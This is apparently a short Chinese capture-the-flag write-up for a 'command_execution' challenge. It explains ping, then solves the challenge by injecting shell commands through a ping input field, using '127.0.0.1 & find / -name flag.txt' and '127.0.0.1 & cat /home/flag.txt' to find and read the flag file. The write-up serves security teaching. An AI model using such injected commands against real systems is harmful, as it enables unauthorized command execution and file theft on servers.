command_execution
小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。
ping (Packet Internet Groper)是一种因特网包探索器,用于测试网络连接量的程序 。Ping是工作在 TCP/IP网络体系结构中应用层的一个服务命令, 主要是向特定的目的主机发送 ICMP(Internet Control Message Protocol 因特网报文控制协议)Echo 请求报文,测试目的站是否可达及了解其有关状态
ping127.0.0.1——这个Ping命令被送到本地计算机的IP软件,该命令永不退出该计算机。如果没有做到这一点,就表示TCP/IP的安装或运行存在某些最基本的问题, 回送地址Ping回送地址是为了检查本地的TCP/IP协议有没有设置好.
咱们ping一下本地地址127.0.0.1
我们查找flag.txt文件,flag在flag.txt中
127.0.0.1 & find / -name flag.txt
在/home/目录下,我们cat它
127.0.0.1 & cat /home/flag.txt